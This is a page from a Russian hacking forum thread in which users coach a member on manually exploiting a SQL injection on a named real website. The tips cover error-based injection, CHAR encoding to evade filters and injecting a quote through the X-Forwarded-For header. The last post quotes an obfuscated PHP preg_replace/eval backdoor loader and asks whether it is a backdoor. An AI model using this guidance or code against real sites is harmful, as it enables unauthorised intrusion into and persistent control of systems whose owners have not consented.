HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2216 из 2422 « Первая < 12161716211621662206 2212 2213 2214 2215 2216 2217 2218 2219 2220 222622662316 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.05.2013, 20:04
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами: 9030789

Репутация: 704
По умолчанию
Цитата:
Сообщение от Protocoler  
Параметр id= в сайте уязвим, при поставке кавычки вылетает ошибка MySQL. Хавиджем все нормально. Но в ручную никак. Не могу использовать не order+by не group+by не работаю, union + select тоже не работает ? каким способом можно найти количество полей ?
фильтры
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 25.05.2013, 20:05
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию
Цитата:
Сообщение от Protocoler  
Параметр id= в сайте уязвим, при поставке кавычки вылетает ошибка MySQL. Хавиджем все нормально. Но в ручную никак. Не могу использовать не order+by не group+by не работаю, union + select тоже не работает ? каким способом можно найти количество полей ?
через еррор базед например, кинул бы ссылку чтоле
 
Ответить с цитированием

  #3  
Старый 26.05.2013, 12:42
Protocoler
Познающий
Регистрация: 10.10.2012
Сообщений: 50
С нами: 7152086

Репутация: 81
По умолчанию
Цитата:
Сообщение от qaz  
через еррор базед например, кинул бы ссылку чтоле
http://www.agriculturalcrossing.com/

И где можно кодировать в Char для обхода фильтров ? Или надо свой софт писать ?
 
Ответить с цитированием

  #4  
Старый 26.05.2013, 12:56
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами: 9030789

Репутация: 704
По умолчанию
Цитата:
Сообщение от Protocoler  
http://www.agriculturalcrossing.com/
И где можно кодировать в Char для обхода фильтров ? Или надо свой софт писать ?
например в плагине hackbar или онлайн сервисами
 
Ответить с цитированием

  #5  
Старый 26.05.2013, 13:38
Protocoler
Познающий
Регистрация: 10.10.2012
Сообщений: 50
С нами: 7152086

Репутация: 81
По умолчанию
Угу, спасибо. Скачаю плагин. Еще вопрос. Мне акунетикс светит уязвимость в заголовке client-ip , но просмотрев заголовки плагином по адресу который указан в акунетиксе, такого заголовка там нет ( Как быть ?
 
Ответить с цитированием

  #6  
Старый 26.05.2013, 13:39
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами: 9030789

Репутация: 704
По умолчанию
Цитата:
Сообщение от Protocoler  
Угу, спасибо. Скачаю плагин. Еще вопрос. Мне акунетикс светит уязвимость в заголовке client-ip , но просмотрев заголовки плагином по адресу который указан в акунетиксе, такого заголовка там нет ( Как быть ?
надо отправить хидер с ковычкой)
 
Ответить с цитированием

  #7  
Старый 26.05.2013, 13:59
Protocoler
Познающий
Регистрация: 10.10.2012
Сообщений: 50
С нами: 7152086

Репутация: 81
По умолчанию
Так нету куда слать. Просто хидера client_ip нету .
 
Ответить с цитированием

  #8  
Старый 26.05.2013, 14:14
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами: 9030789

Репутация: 704
По умолчанию
Цитата:
Сообщение от Protocoler  
Так нету куда слать. Просто хидера client_ip нету .
есть X_FORWARDED_FOR

тебе это надо
 
Ответить с цитированием

  #9  
Старый 26.05.2013, 14:38
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию
Цитата:
Сообщение от Protocoler  
Угу, спасибо. Скачаю плагин. Еще вопрос. Мне акунетикс светит уязвимость в заголовке client-ip , но просмотрев заголовки плагином по адресу который указан в акунетиксе, такого заголовка там нет ( Как быть ?
Нет там уязвимости, откуда ты взял это?
 
Ответить с цитированием

  #10  
Старый 26.05.2013, 16:29
blesse
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами: 7535126

Репутация: 1
По умолчанию
Наткнулся на

Код:
@preg_replace("\x25\50\x5b\141\x2d\172\x41\55\x5a\60\x2d\71\x2b\75\x20\137\x2d\135\x2b\51\x25\145\x73\151","\x65\166\x61\154\x28\47\x24\153\x79\145\x3d\67\x36\64\x38\70\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x6b\171\x65\75\x37\66\x34\70\x38\73","\x4c\63\x5a\150\x63\151\x39\63\x64\63\x63\166\x64\155\x68\166\x63\63\x52\172\x4c\62\x39\171\x63\62\x4e\157\x62\110\x56\171\x59\62\x67\165\x5a\107\x55\166\x61\110\x52\60\x63\107\x52\166\x59\63\x4d\166\x64\63\x41\164\x59\62\x39\165\x64\107\x56\165\x64\103\x39\61\x63\107\x78\166\x59\127\x52\172\x4c\172\x49\167\x4d\124\x41\166\x4d\104\x55\166\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");
не бэкдор чейто часом?
 
Ответить с цитированием
Ответ
Страница 2216 из 2422 « Первая < 12161716211621662206 2212 2213 2214 2215 2216 2217 2218 2219 2220 222622662316 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...